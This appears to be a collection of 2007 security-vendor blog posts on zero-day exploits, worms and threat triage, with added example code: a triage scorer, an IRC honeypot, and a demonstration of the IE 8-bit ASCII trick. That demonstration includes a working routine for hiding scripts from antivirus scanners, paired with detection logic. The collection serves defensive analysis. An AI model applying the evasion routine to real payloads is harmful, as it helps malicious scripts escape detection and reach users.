You obviously want to have the biggest net possible to gather the most issues. This is true in threat discovery as well as in fishing (notice, no ‘ph’ pun here). Like the growing numbers of disclosures, the sheer numbers of sources can overwhelm. Just think - how many URLs are in your ’security favorites’? Or how many newsletters and RSS feeds do you subscribe to? Can you possibly cover them all? Sticking with the ‘heavy-weights’ is a safe bet for major issues, but what about one-offs that are published on obscure sites? Be sure to grab as many resources as feasible to use the biggest net.

Step Two. Evaluate the net.

Now that you have the mother of all fishnets, evaluate it. If the holes are too big, the fish slip through. If the holes are too small, you gather far more information than you could possibly use, let alone care about. A local denial-of-service vulnerability in Joe Bob’s Digital 8-Track Player most likely does not warrant review, especially when a vulnerability in a more widely used application will certainly be popping up. Fishnets have holes for a reason. Pinpointing your sources can help make sure the holes are just the right size.

You may have resource limitations that limit the amount of data you can process, so relevance is important. Remember, security at its core is about defending what you can and accepting the risk for what you can’t. (Of course, try telling your boss that, right?)

When looking for threats, evaluate the needs of your enterprise beforehand. A list of the applications that can be found on any important host is a start. That way, when you discover an issue, you can reference this list and quickly correlate it with what is important to you. Although really nice, an asset inventory application may not fit your budget; script up some quick and dirty code to scan an Excel doc if need be. Just be sure that you are capturing only the relevant threats: information overload can become your enemy when you are trying to determine a threat’s importance.

Step Three. Evaluate the catch.

So now you’ve thrown the net and pulled in the catch. That’s a lot of food – or is it? What you find in your net may range from the best-of-breed sport fish to the algae feeding bottom dwellers. You may not even know if they are edible.

Now you need to filter out the most pressing issues. Risk ratings (another topic for another day) alone may or may not tell the whole story; there are few across-the-board standards for ratings. You need to jump in, look at the threat and determine its potential impact. Ask yourself: Does it execute code? Does it execute code remotely? Is user interaction needed? Is there a public exploit? Follow the threat to its end result if it were successfully exploited, and make a list of the ones to watch for, in order of importance.

You can now compare the list of issues with your defense audits. (You have done your audits, so you know what you’ve got to defend with, the potential threat vectors, and user account access, to name a few, right?) Follow the path an attacker may take from external and internal starting points to the most valuable assets that may be affected. Along those points you will know where your defenses lie. This gives you a list of changes that need to be made in order to mitigate, or that will buy you some time before patching.

Step Four. Fish Fry

Now that you have chosen the net, cast it, and sorted your catch, you can go out and fry up the perfect one that didn’t get away.

Armed with a plan, you can set about defending against the most potent of threats.
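To make Steps Two and Three concrete, here is an added example (my own illustration, not code from the post or from McAfee) that correlates a constructed advisory feed with a constructed application inventory and defense audit, scores each issue on the questions above (remote? code execution? user interaction? public exploit? patched?) and ranks the catch. All product names, advisory IDs, host roles and control names are made-up placeholders, and the scoring weights are an assumption to be tuned to your own environment.

```python
from dataclasses import dataclass
from typing import Dict, List, Set


@dataclass(frozen=True)
class Advisory:
    """One item pulled in by the net; the fields are what you answer when
    you 'follow the threat to its end result'."""
    ident: str           # placeholder ID, not a real advisory
    product: str
    remote: bool         # reachable over the network without prior access
    code_exec: bool      # arbitrary code execution (False: DoS / info leak)
    needs_user: bool     # a user must open or click something
    public_exploit: bool
    patched: bool        # vendor fix available


# Constructed asset list (Step Two): product -> host roles it runs on.
INVENTORY: Dict[str, Set[str]] = {
    "dns-server": {"internet-facing"},
    "word-processor": {"workstation"},
    "vpn-client": {"remote-host"},
    "media-player-xyz": set(),      # not deployed: falls through the net
}

# Constructed defense audit (Step Three): controls present per host role.
CONTROLS: Dict[str, Set[str]] = {
    "internet-facing": {"ips-signature"},
    "workstation": {"mail-attachment-filter", "host-av"},
    "remote-host": {"host-av"},
}

# Constructed feed of four advisories (placeholder IDs).
ADVISORIES = [
    Advisory("ADV-1", "dns-server", remote=True, code_exec=True,
             needs_user=False, public_exploit=True, patched=False),
    Advisory("ADV-2", "word-processor", remote=True, code_exec=True,
             needs_user=True, public_exploit=False, patched=True),
    Advisory("ADV-3", "media-player-xyz", remote=False, code_exec=False,
             needs_user=True, public_exploit=True, patched=False),
    Advisory("ADV-4", "vpn-client", remote=False, code_exec=False,
             needs_user=False, public_exploit=False, patched=False),
]


def impact(a: Advisory, roles: Set[str]) -> int:
    """Weighted answers to the triage questions. Weights are an assumption."""
    score = 4 if a.code_exec else 0
    score += 3 if a.remote else 0
    score += 2 if not a.needs_user else 0       # no social engineering needed
    score += 2 if a.public_exploit else 0
    score += 1 if not a.patched else 0          # nothing to deploy yet
    if a.remote and "internet-facing" in roles:
        score += 2                              # shortest attacker path
    return score


def controls_on_path(a: Advisory, roles: Set[str],
                     controls: Dict[str, Set[str]]) -> Set[str]:
    """Which existing controls sit on the attacker's path for this issue."""
    available: Set[str] = set()
    for role in roles:
        available |= controls.get(role, set())
    on_path: Set[str] = set()
    if a.remote and "ips-signature" in available:
        on_path.add("ips-signature")
    if a.needs_user and "mail-attachment-filter" in available:
        on_path.add("mail-attachment-filter")
    if a.public_exploit and "host-av" in available:
        on_path.add("host-av")                  # a public exploit can be signatured
    return on_path


def urgency(score: int) -> str:
    if score >= 10:
        return "now"
    return "this cycle" if score >= 6 else "routine"


def triage(advisories: List[Advisory],
           inventory: Dict[str, Set[str]] = INVENTORY,
           controls: Dict[str, Set[str]] = CONTROLS) -> List[dict]:
    """Step Two filters by inventory, Step Three scores and maps controls;
    the result is the ordered list of 'ones to watch for'."""
    rows = []
    for a in advisories:
        roles = inventory.get(a.product, set())
        if not roles:
            continue                            # not our fish
        score = impact(a, roles)
        rows.append({"id": a.ident, "score": score, "roles": sorted(roles),
                     "mitigations": sorted(controls_on_path(a, roles, controls)),
                     "urgency": urgency(score)})
    return sorted(rows, key=lambda r: r["score"], reverse=True)


if __name__ == "__main__":
    for row in triage(ADVISORIES):
        print(row)
```

Running it lists ADV-1 first (remote, unauthenticated code execution on an internet-facing host, public exploit, no patch) with the IPS signature as the only control on its path, ADV-2 second with the mail attachment filter in front of it, and ADV-4 last; ADV-3 never appears because the product is not in the inventory. Swap the constructed dictionaries for your own spreadsheet export and feed.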

RPC DNS Worm Spotted In The Wild

A new Nirbot variant has been discovered that attempts to exploit the recent zero day vulnerability in Microsoft’s DNS Server Service (CVE-2007-1748).

Vulnerability to Worm Timeline:

  • April 7 - This vulnerability was first reported by SANS in what was believed to be a targeted attack
  • April 12 - Microsoft posted Microsoft Security Advisory (935964)
  • April 14 - An exploit was made public
  • April 15 - Three other exploits were made public
  • April 15 - The first worm was submitted to McAfee Avert Labs late in the day

Analysis is ongoing. More details will be posted here.

Update April 16, 20:30 PDT
A second variant has been discovered.

First Variant
File Name: mdnex.exe (writes c:\U.exe)
File Size: 199,680 bytes
MD5: c1a6a22b2415ba608fb894b4e036e19c

Second Variant
File Name: mozila.exe (writes c:\U.exe)
File Size: 270,848 bytes
MD5: 8f6cb8d895e60387fe3e41377d0f0d3f

Exploit-TaroDrop.b – Heuristics vs 0-day Gymnastics

On April 6th, 2007, our heuristics proactively detected a new document exploit for Ichitaro, a popular Japanese word processor, that was exploiting a new 0-day vulnerability in the wild. The vendor was notified immediately and confirmed that we had identified a new, previously unknown vulnerability. This follows the other 0-day vulnerability in Ichitaro that was exploited in the wild in August of the previous year.

The specially crafted document (Exploit-TaroDrop.b) came with a Japanese filename with extension “.jtd” that is used by Ichitaro.

When users open this document, Exploit-TaroDrop.b triggers a buffer overflow, executes shellcode, drops malware as %Windir%\System32\downhk.exe (BackDoor-DKI.dldr) and silently terminates. Before the user can notice the disruption, Ichitaro is restarted and they can continue viewing the document, but now under a different filename, “a.jtd”.

What goes on behind the scenes is Exploit-TaroDrop.b taking control of code execution from Ichitaro after the buffer overflow occurs and causes the application to terminate. The malware author attempts to “repair” the user experience by dropping a clean document that can be viewed in Ichitaro, so as not to arouse suspicion.

We are seeing similar methods used in document exploits for Microsoft Office applications. Although the method may vary in other cases, it is worth checking the filename in the application title bar and taking note of any such abnormal behavior (an unexpected restart, a document reopening under a different name).

We can expect malware authors to continue discovering and creating new exploits in localized (and often neglected) applications, and to use various social engineering methods to keep these threats undetected. Users must be armed with both advanced heuristics and good vigilance and intuition, and even then threats like these are going to be increasingly difficult to track and defend against.

A security patch is being developed by the vendor to deal with this vulnerability.

This malware was reported by both Shinsuke Honjo and Geok Meng Ong of McAfee Avert Labs.

Malware Exploits Microsoft “Feature” Along With Vulnerabilities

Danger And Benefits of Obfuscation
Most of the malicious code we see on a daily, even hourly, basis is obfuscated in one way or another: PE (portable executable) files are packed (compressed and/or encrypted), scripts are encoded and/or encrypted, and so on. Obfuscation is one of the biggest challenges for content scanners today, both on the host and on the wire. Emulation has been instrumental in getting past layers of obfuscation without the need for custom decryption code for each new threat, by letting malicious code decrypt itself in a “sandbox”. Over time, however, anti-emulation, anti-debugger and more generally anti-deobfuscation techniques have made this more challenging, and emulation comes with a performance impact. But there are more rudimentary ways to tackle this problem.

Obfuscation is a double-edged sword. At some point the methods used to evade detection go to such an extreme that the method itself is enough to base detection on. In October last year, an obfuscation module was introduced for a popular penetration testing toolkit. One of its methods involves generating random white space inside HTML exploits. This tactic can evade detection in some cases, but the “noise” itself can be enough to trigger on: valid files do not typically contain it. This paradox is present in other areas of threat tactics as well. Take social engineering, for example. Email spam, and even viruses, that are so overwhelmingly written to trick users into taking some action often stick out like a sore thumb. Another example is the plethora of threats that do not function in the forensic environments typically used by researchers. Today it seems that more bots are built NOT to run under virtual machine environments than to run under them. The result: many infections can be avoided simply by running in a virtual environment. As more and more users run virtual machines, the anti-researcher technique becomes a hindrance to the malware.

Internet Explorer “Feature” Exploited
In June 2006, an issue was reported in the way Internet Explorer interprets ASCII characters. When a page is declared as ASCII encoded, IE takes only the low 7 bits of each 8-bit byte into account, ignoring the most significant (8th) bit. For example, both values shown below are interpreted as the character ‘A’ if only 7 bits are considered and the 8th is ignored, but the representation is different if all 8 bits are accounted for. Other browsers do not show this behavior.

Hex   Binary     7-bit char   8-bit char
41    01000001   A            A
C1    11000001   A            Á in ISO-8859-1 (not a valid 7-bit ASCII value)

This issue has been discussed before, and because of ambiguity in the specifications it cannot exactly be considered a bug in IE. Whether Microsoft got it right in IE and most everyone else got it wrong (including Mozilla and Opera), or the other way around, it is a challenge for most traditional anti-malware scanners when they look at 8-bit representations of web pages. The technique can be used for malicious purposes: otherwise known threats suddenly “appear unknown” to scanners, yet render fine in IE. We ran a small test by “encoding” some well known and detected threats with this technique, and none of the AV scanners tested passed (including Microsoft’s).

Obviously this problem can be solved, either by fixing the bug/feature in IE or by updating content scanners to decode the way IE does.

There may be another option. Like the obfuscation techniques mentioned above, this encoding is a hindrance to detection but at the same time opens a window for proactive detection: the presence of 8-bit characters with values greater than 0x7F (the maximum possible with 7 bits) can be considered suspicious in the context of an ASCII-encoded web page.
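As an added example serving both this section and the “Mapping the Future of an Exploit” post above (my own code, not from the original posts), the following Python models the 7-bit decoding described here, an obfuscator that abuses it, and the proactive check proposed in the previous paragraph. The HTML page, the script and the scanner signature are constructed samples; the “set the high bit on every second byte” pattern is an assumption chosen for determinism, and in-the-wild samples choose which bytes to flip differently.

```python
import re
from typing import Optional

# Constructed sample script, the kind a drive-by page would carry.
SAMPLE_SCRIPT = 'document.write("<div id=\\"x\\">hi</div>");'
# Constructed signature a byte-level scanner would look for.
SIGNATURE = b"document.write("

_CHARSET_US_ASCII = re.compile(rb'charset\s*=\s*["\']?\s*us-ascii', re.IGNORECASE)


def obfuscate_high_bit(script: str) -> bytes:
    """Set bit 7 on every second byte (assumed pattern; real samples vary).
    Under IE's 7-bit decoding the result is the unchanged script; to a
    scanner that honours all 8 bits it is a different byte sequence."""
    raw = script.encode("ascii")
    return bytes(b | 0x80 if i % 2 else b for i, b in enumerate(raw))


def decode_like_ie(data: bytes) -> str:
    """IE, per the post, keeps only the low 7 bits of each byte of a page
    declared as US-ASCII."""
    return bytes(b & 0x7F for b in data).decode("ascii")


def decode_strict(data: bytes) -> Optional[str]:
    """A strict ASCII decoder (other browsers, most scanners) rejects bytes
    above 0x7F; returns None when the data is not valid 7-bit ASCII."""
    try:
        return data.decode("ascii")
    except UnicodeDecodeError:
        return None


def build_page(script_bytes: bytes) -> bytes:
    """Wrap a (possibly obfuscated) script in a page that declares US-ASCII.
    The wrapper stays clean so the charset declaration itself is readable."""
    return (b'<html><head><meta http-equiv="Content-Type" '
            b'content="text/html; charset=us-ascii"></head>'
            b"<body><script>" + script_bytes + b"</script></body></html>")


def declares_us_ascii(page: bytes) -> bool:
    return _CHARSET_US_ASCII.search(page) is not None


def high_bit_count(page: bytes) -> int:
    return sum(1 for b in page if b > 0x7F)


def is_suspicious(page: bytes) -> bool:
    """The heuristic from the post: bytes above 0x7F cannot be legitimate
    content in a page that declares itself US-ASCII."""
    return declares_us_ascii(page) and high_bit_count(page) > 0


def scan(page: bytes, signature: bytes = SIGNATURE) -> dict:
    """Compare a naive byte match with one made after normalising the page
    the way IE decodes it. Normalisation applies only when the page declares
    US-ASCII; for any other charset bit 7 carries real data."""
    normalised = bytes(b & 0x7F for b in page) if declares_us_ascii(page) else page
    return {
        "suspicious": is_suspicious(page),
        "high_bytes": high_bit_count(page),
        "raw_match": signature in page,
        "normalised_match": signature in normalised,
    }


if __name__ == "__main__":
    clean = build_page(SAMPLE_SCRIPT.encode("ascii"))
    evil = build_page(obfuscate_high_bit(SAMPLE_SCRIPT))
    print("clean:", scan(clean))
    print("obfuscated:", scan(evil))
    # IE renders both identically; a strict decoder rejects the second.
    print(decode_like_ie(evil) == clean.decode("ascii"), decode_strict(evil))
```

The clean page matches the signature either way and has no high bytes. The obfuscated page defeats the raw byte match, still decodes to the identical page under the IE rule, and trips both the high-byte heuristic and the normalised signature match, which is the two-pronged check a gateway scanner can run without emulating the browser.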

Real-World Attack
McAfee Avert Labs has been monitoring this technique being used in the wild for malicious purposes. In one recent case, the payload exploits MS06-055, a patched Microsoft VML vulnerability, to download the W32/Fujacks.ab virus.

Fujacks.ab is a variant of Fujacks.aa (the first known worm to leverage the recent ANI file handling vulnerability). The group behind these Fujacks variants was one of the frontrunners in hosting ANI exploits (patched in MS07-017). So not only were they early adopters of ANI file exploitation, they were also early adopters of 8-bit ASCII malware obfuscation.

The MS06-055 exploit connected with Fujacks.ab utilizes obfuscation techniques discussed in the first section of this blog, and is proactively detected as Exploit-ObscuredHtml as a result. Also VirusScan’s ScriptScan is able to see past the 8-bit ASCII encoding and detects as JS/Exploit-BO.gen.

It is interesting to note that none of the other AV scanners tested detect this obfuscated sample even though many do detect once decoded.

McAfee ScriptScan to the Rescue
Emulation can be an effective way to get underneath obfuscation, but anti-emulation techniques may circumvent this approach. McAfee VirusScan products contain a feature known as ScriptScan, a technology capable of scanning beyond the obfuscated layer in client-side web scripts. Most obfuscated scripts contain simple but redundant arithmetic and variable randomization that bypass most file scanners; they are a challenge to products that scan these files only at the top layer, because legitimate scripts can contain similar constructs. ScriptScan monitors script execution in Microsoft Internet Explorer (IE) and scans the underlying scripts exactly as decoded by IE. More critically, scripts must be decoded to run, and ScriptScan is invoked before they can execute, effectively blocking malicious scripts from running.

Why Many Comparative Tests Are Flawed
While our tests show a lack of file detection, they are admittedly flawed, for the same reason that VirusTotal and a number of other comparative tests are flawed: they don’t test threats in their real-world environment. 8-bit ASCII obfuscated threats may not be detected by command-line, on-demand, or even certain on-access scanners. However, if those threats are scanned in the course of being rendered by Internet Explorer, the obfuscation is removed (which is what allows VirusScan’s ScriptScan to detect them). It is unclear how many AV products contain such a feature. While this approach is not possible at the gateway, emulation may be a partial solution. Clearly a challenge with emulation is that one must code the emulator to mirror the behavior of the interpreter, in this case Internet Explorer, and mirroring includes coding in the same bugs and features, such as IE’s 8-bit ASCII decoding. It is believed that the majority of web content scanners do not handle such decoding the way IE does. It would be prudent for Microsoft to resolve this and remove the capability from the hands of attackers.

ANI Exploits Made Easy

Do you ever ask yourself why we talk so much about “another” vulnerability?

For starters, up until a few hours ago, this vulnerability was not covered by an official patch. Another good reason is the fact that we are seeing exploits in the wild.

And if that was not enough, now kits have been released that allow basically anyone to create his or her own exploits, making it a really simple task.

The video below shows exactly that: how easy it is to create such exploits, so you can understand why you should worry and protect yourself.

ANI Patch Released, Patch ASAP

Microsoft has released a patch for CVE-2007-1765 (aka CVE-2007-0038).  Anyone using a vulnerable system should install this patch ASAP. Hundreds of websites have been found to be hosting exploits, with thousands of websites and spam leading users to that malicious code.  The number of attacks is likely to rise steadily for several weeks if not months.  Exploit-ANIfile.c detection quickly rose to the number one spot on our consumer regional virus tracker chart for Asia, over the weekend.  We can expect the detection of this exploit to top the charts as the most widely seen exploit over the next few weeks as well.  Currently it is taking up the number six spot on the worldwide chart:

Virus Tracker Chart

There has been some confusion around whether or not Vista is vulnerable to remote code execution.  I’ve posted this video to demonstrate this case.  Here, with DEP enabled (default settings), and IE7 running in protected mode, you will see a proof of concept in action.

ANI File Exploit Has Connection With Hacked Super Bowl Site

Another follow-up to my Unpatched Drive-By Exploit Found On The Web post.

Last month Websense reported that the official website of Dolphin Stadium, host of Super Bowl XLI, was compromised and serving malicious code.  In fact that was a massive attack affecting thousands of websites.  Those sites were injected with a script reference that pointed to exploit code.  At that time, the code exploited known vulnerabilities.

The SANS Institute did some investigating into that incident.  They posted portions of a response they received from a system admin where it was clear that a remote attacker exploited a SQL injection vulnerability to embed the malicious script.  The same script is now serving the ANI file 0-day exploit reported yesterday.  Googling the referenced script yields 113,000 results.  It’s likely that most of those sites were compromised through SQL injection vulnerabilities.  Of course many of these sites have been cleaned up, malicious references removed, but not all.

Unpatched Drive-By Exploit Found on the Web (Follow-Up)

In response to this issue, Microsoft has posted Security Advisory 935423. Microsoft states the following operating systems are vulnerable:

  • Microsoft Windows 2000 Service Pack 4
  • Microsoft Windows XP Service Pack 2
  • Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium)
  • Microsoft Windows XP Professional x64 Edition
  • Microsoft Windows Server 2003
  • Microsoft Windows Server 2003 for Itanium-based Systems
  • Microsoft Windows Server 2003 Service Pack 1
  • Microsoft Windows Server 2003 with SP1 for Itanium-based Systems
  • Microsoft Windows Server 2003 x64 Edition
  • Microsoft Windows Vista

Last night I had a chance to test Vista’s vulnerability. In the process of setting up the environment, I dragged and dropped a malicious ANI file to the desktop. This causes Vista to enter an endless crash-restart loop. I captured a video of this occurring.

Note, this crash-restart doesn’t represent current real-world attacks, which are delivered over the Web. Those attacks would likely come through a Web browser.

Unpatched Drive-By Exploit Found On The Web

Several of my posts over the last few months have centered around very targeted zero-day attacks.  This post covers an exploit that McAfee researchers discovered in the field, posted to a message board.  That posting was simply a proof of concept; however McAfee Avert Labs has since received a malicious sample as well.  It is quite likely that similar exploits targeting this vulnerability are currently being used in other attacks on the web.

Preliminary tests demonstrate that Internet Explorer 6 and 7 running on a fully patched Windows XP SP2 are vulnerable to this attack.  Windows XP SP0 and SP1 do not appear to be vulnerable, nor does Firefox 2.0.  Exploitation happens completely silently.

The vulnerability lies in the handling of malformed ANI files.  Known exploits download and execute arbitrary exe files.  This vulnerability is reminiscent of MS05-002.

More information will be posted as it becomes available.

Update March 29 @ Noon
Additional information has been posted here:
http://www.avertlabs.com/research/blog/?p=233

Exploit Targeting Unpatched Word Vulnerability Spotted (Follow-up)

This is an update to the update on CVE-2007-0870.

A few days ago I blogged about a new Word vulnerability that was used in a targeted attack (I know, it’s hard to keep these straight). Later that day Microsoft stated that the vulnerability was limited to denial of service, rather than remote code execution, and the blog was updated accordingly.

Well, since then our researchers continued to look at the issue, as did Microsoft’s. Today, McAfee Avert Labs’ analysis shows that this vulnerability is likely not limited to denial of service and that remote code execution may in fact be possible. Microsoft has also acknowledged that the vulnerability may not be limited to denial of service. Word 2000 and Word XP are believed to be vulnerable, though exploiting this flaw is non-trivial.

I suspect that a Microsoft Security Advisory for this issue will be released soon.

In related news, the team is currently analyzing proof-of-concept Excel files that were posted publicly today as “Microsoft Office Excel 2003 XLS File Denial Of Service”.

Update Feb 14, 6:15pm
A short while ago Microsoft did indeed release Microsoft Security Advisory (933052).

PowerPoint Version of (just patched) Office Zero-Day Spotted

Earlier today Symantec posted a description for Trojan.PPDropper.G.  The vulnerability mentioned in the description has been assigned CVE-2007-0913.  SANS added it to their missing Microsoft patches table.

However, McAfee Avert Labs’ testing shows this issue was patched today in MS07-015 along with the Office Zero-Day reported by McAfee on February 2 (CVE-2007-0671).  This testing suggests Trojan.PPDropper.G may in fact be a PowerPoint version of the Office zero-day exploit used in Exploit-MSExcel.h.

We will post an update when we have more definitive information.

Update Feb 14,  2007
Microsoft has confirmed that this is patched in MS07-015 and related to CVE-2007-0671.

Exploit Targeting Unpatched Word Vulnerability Spotted

On the heels of my Zero-Day Excels Over Word blog, McAfee Avert Labs is currently investigating a new Word exploit.  Preliminary analysis shows that this is a different issue than those referenced in my last blog:

  • CVE-2006-5994
  • CVE-2006-6456
  • CVE-2006-6561
  • CVE-2007-0515
  • CVE-2007-0621 (Microsoft states this is a duplicate of CVE-2006-6456)
  • CVE-2007-0671 (Office zero-day uncovered by McAfee Avert Labs)

This new exploit may be somehow related to MS06-027, and the DAT files have proactively detected this new threat as a variant of Exploit-MS06-027 since June 2006.  This threat appears to exploit Word 2000.  Again, this is preliminary analysis.  We are working with Microsoft to confirm the history of this vulnerability and will update the blog when we have more information.

Like many of the recent Word exploits, this appears to have been used in a very limited and targeted attack.

Update Feb 9, 1:30pm
Microsoft has acknowledged this issue.  They state that it is limited to a Denial of Service attack on Word 2000 and that code execution is not possible.

Denial of Service is clearly not as critical as other recent issues.  Looks like this targeted attack was flawed.

Update Feb 14, 4:30pm

Further analysis shows this is likely not limited to denial of service.  See Exploit Targeting Unpatched Word Vulnerability Spotted (Follow-up).

Bot Countermeasures

Malware authors have been at the cutting edge of incorporating exploit code for zero-day vulnerabilities into their creations. Fueled by financial incentives and readily available source code, the bad guys of today aggressively pursue continued development of malware code. Over the years, the window between a vulnerability’s discovery and its incorporation into a worm or exploit candidate has shrunk from months, to weeks, to zero day. This leaves administrators with very little time to schedule and deploy patches to all servers and workstations on their networks. If the network is hit with a bot that uses a zero-day vulnerability during this vulnerable time frame, an organization could be faced with a potential worm outbreak or large-scale attack.

The table below shows the time frame between the vulnerability being reported and how long it took for malware authors to incorporate it into a worm candidate.

Patch      Malware   Patch Availability   Worm Attack Date   Number of days for worm to appear
MS01-020   Nimda     Oct 17th, 2000       Sept 18th, 2001    335 Days
MS02-061   Slammer   July 24th, 2002      Jan 25th, 2003     185 Days
MS03-026   Blaster   July 16th, 2003      Aug 11th, 2003     26 Days
MS04-011   Sasser    Apr 13th, 2004       Apr 30th, 2004     17 Days
MS05-039   Zotob     Aug 09th, 2005       Aug 14th, 2005     5 Days
MS06-040   Mocbot    Aug 08th, 2006       Aug 12th, 2006     4 Days

The paper “Defeating bots on the internal network” from McAfee Avert Labs, published in the Feb 2007 issue of Virus Bulletin, describes setting up an IRC honeypot on a network using minimal resources and requiring little maintenance, to be used as an early warning system that proactively alerts on botnet activity. Also discussed is using the internal IRC honeypot to gain control over infected machines and remove the bot from them.
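As an added illustration of the early-warning half of that idea (editor-supplied example code, not code from the Virus Bulletin paper or from McAfee), the Python below speaks just enough of the IRC server side to keep a bot talking and raises an alert for every client that connects, registers, joins a channel or sends a message. Nothing on an internal network should be configured to talk to a server that does not officially exist, so the connection itself is the signal; the channel name and key a bot asks for are what you then feed to your blocklists. The server name `irc-honeypot.internal`, the port, and the bot-style lines in the test are assumptions; only the alerting side is shown.

```python
import logging
import socketserver

# Assumption: the name the honeypot announces to clients.
SERVER_NAME = "irc-honeypot.internal"

logging.basicConfig(level=logging.INFO, format="%(asctime)s %(levelname)s %(message)s")


def parse_params(rest):
    """Split IRC parameters; a parameter beginning with ':' runs to the end of the line."""
    params = []
    rest = rest.lstrip(" ")
    while rest:
        if rest.startswith(":"):
            params.append(rest[1:])
            break
        head, _, rest = rest.partition(" ")
        params.append(head)
        rest = rest.lstrip(" ")
    return params


class IrcSession:
    """Speaks just enough IRC to keep a bot talking and records what it asks for."""

    def __init__(self, peer):
        self.peer = peer
        self.nick = "*"
        self.registered = False
        self.channels = []
        self.closed = False
        self.alerts = []
        # Merely connecting is the first signal: no legitimate host should be here.
        self._alert("connect", "new client on the IRC honeypot port")

    def _alert(self, kind, detail):
        self.alerts.append({"peer": self.peer, "kind": kind, "detail": detail})
        logging.warning("ALERT %s %s: %s", self.peer, kind, detail)

    def _reply(self, numeric, text):
        return f":{SERVER_NAME} {numeric} {self.nick} {text}"

    def feed(self, line):
        """Process one client line; return the lines to send back."""
        line = line.rstrip("\r\n")
        if not line:
            return []
        if line.startswith(":"):  # optional message prefix, ignored
            _, _, line = line.partition(" ")
        cmd, _, rest = line.partition(" ")
        cmd, params = cmd.upper(), parse_params(rest)
        out = []
        if cmd == "NICK" and params:
            self.nick = params[0]
        elif cmd == "USER" and len(params) >= 4 and not self.registered:
            self.registered = True
            self._alert("register", f"nick={self.nick} user={params[0]} realname={params[3]}")
            out.append(self._reply("001", f":Welcome to {SERVER_NAME}"))
            out.append(self._reply("422", ":MOTD File is missing"))  # bots wait for 376/422
        elif cmd == "JOIN" and params:
            key = params[1] if len(params) > 1 else "-"
            for chan in params[0].split(","):
                self.channels.append(chan)
                # The channel (and key) a bot asks for identify its C&C rendezvous.
                self._alert("join", f"channel={chan} key={key}")
                out.append(f":{self.nick}!bot@{self.peer} JOIN :{chan}")
                out.append(self._reply("366", f"{chan} :End of /NAMES list."))
        elif cmd == "PING":
            token = params[0] if params else SERVER_NAME
            out.append(f":{SERVER_NAME} PONG {SERVER_NAME} :{token}")
        elif cmd == "PRIVMSG" and len(params) >= 2:
            self._alert("privmsg", f"to={params[0]} text={params[1][:80]}")
        elif cmd == "QUIT":
            self.closed = True
        return out


class HoneypotHandler(socketserver.StreamRequestHandler):
    def handle(self):
        session = IrcSession(self.client_address[0])
        for raw in self.rfile:
            for reply in session.feed(raw.decode("utf-8", "replace")):
                self.wfile.write((reply + "\r\n").encode())
            if session.closed:
                break


def serve(host="0.0.0.0", port=6667):
    """Run the honeypot; route the WARNING log lines into whatever alerting you already have."""
    with socketserver.ThreadingTCPServer((host, port), HoneypotHandler) as srv:
        srv.daemon_threads = True
        srv.serve_forever()


if __name__ == "__main__":
    serve()
```

Keep the listener on an address range that real IRC clients are never pointed at; then every alert is a host worth pulling off the network, and the `join` details give you the channel names to block at the egress.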

Zero-Day Excels Over Word

There have been numerous stories recently covering unpatched Microsoft Word vulnerabilities. For reference, the CVE designations for these vulnerabilities are:

Recently McAfee Avert Labs added detection for Exploit-MSExcel.h, an Excel document that was submitted from the field. This exploit is consistent with other targeted zero-day attacks and is believed to be contained.

Microsoft has confirmed that this exploit targets an unpatched vulnerability. According to Microsoft’s Security Advisories Archive (Microsoft Security Advisories are released in advance of patch releases, not to be confused with Microsoft Security Bulletins), the only Excel-related security advisory in the past 20 months was patched in MS06-037. Numerous other Excel-related patches have been released during this time.

Update Feb 2, 2007 at 7 pm PST
Microsoft Security Advisory (932553) has been released and CVE-2007-0671 has been assigned. Microsoft describes this vulnerability as affecting the following products:

• Microsoft Office 2003
• Microsoft Office XP
• Microsoft Office 2000
• Microsoft Office 2004 for Mac

From the advisory:

Workarounds for Microsoft Office Remote Code Vulnerability:
Microsoft has tested the following workarounds. While these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, it is identified in the following section.

  • Do not open or save Office files that you receive from un-trusted sources or that you receive unexpectedly from trusted sources. This vulnerability could be exploited when a user opens a specially crafted Office file.

McAfee Avert Labs has confirmed Microsoft’s testing; not opening malicious Office files successfully mitigates this threat.

MS Zero-Day Flurry

While various bits of North America have seen wintry flurries in the past fortnight, those in computer security have seen a flurry of four Microsoft-related zero-day exploits.

The first three of these flaws affect Microsoft Visual Studio:

The fourth flaw affects Microsoft Word:

All four flaws would allow a remote attacker to execute arbitrary code on a vulnerable machine. In all four cases, user interaction is required for an attack to occur; e.g., a user would have to visit a Web site that hosts a malicious file or open a malicious file locally.

With Microsoft’s next Patch Tuesday falling on February 13, these flaws will remain un-patched for at least two more weeks. So stay warm this winter, and insulate yourself from these zero-day exploits too!

Exploits in the “Wild West”

This just hasn’t been a great year for the security of applications or responsible disclosure, has it? First we have the Month of Apple Bugs (which is finding a number of application-specific vulnerabilities), then we have a raft of Adobe product vulnerabilities. Now we have VeriSign offering a substantial bounty for people to poke holes in IE7 and Vista.

It seems that what we’re seeing in the malware world is also happening in the vulnerability world: financial motivation, a vast increase in overall traffic with no one incident being particularly huge, and a general feeling of being in the Wild West. Lawlessness and vigilantism seem to be the order of the day. That doesn’t generally lead one to feel like the internet is a shiny, happy place.

But what are we to do about this? Telling people they’re naughty and need to behave, when they’re getting such notoriety or financial gain, obviously isn’t going to work. Making the notoriety and money stop coming is a largely futile effort as well, it would seem. Even suing adware makers, as an example, seems to be reasonably ineffective.

Maybe the key lies in the consumer side of the equation. Maybe as the general populace becomes more aware of what things to avoid, and what things to do to protect themselves, this will become a moot point. The glut of malware and vulnerabilities will be like flies buzzing in our ears: an academic concern rather than a constant state of emergency. I do find it hopeful that people are becoming more aware of security issues, even if we have a very long way to go yet.

The PDF Flaws are coming!! The PDF Flaws are coming!!

For many, the Portable Document Format (PDF) has become the de-facto standard for exchanging documents. In using PDFs, some wish to sidestep the risks of malware-prone Microsoft Office documents. But with the announcement of six new PDF-related vulnerabilities in several security forums last week, we should all now be more careful with PDFs.

The first five of these new vulnerabilities have to do with the Adobe Reader plugin. Attacks that exploit these flaws may have one or more of these results: HTTP-response splitting, cross-site scripting, session forgery, session riding, denial of service, memory corruption, or code execution. This scary list of attack results notwithstanding, a user would have to open a malicious web URL for an attack to occur. Adobe has issued Adobe Reader 8, which remedies these flaws.

The sixth new PDF vulnerability is also the sixth installment of the Month of Apple Bugs (MoAB). If a malicious PDF document crafted to exploit this flaw were opened by a user, it would corrupt memory and could lead to code execution. Landon Fuller has posted or referred to temporary fixes for all eight MoAB flaws so far. The fix for the MoAB PDF flaw can be found here. Thank you, Landon!

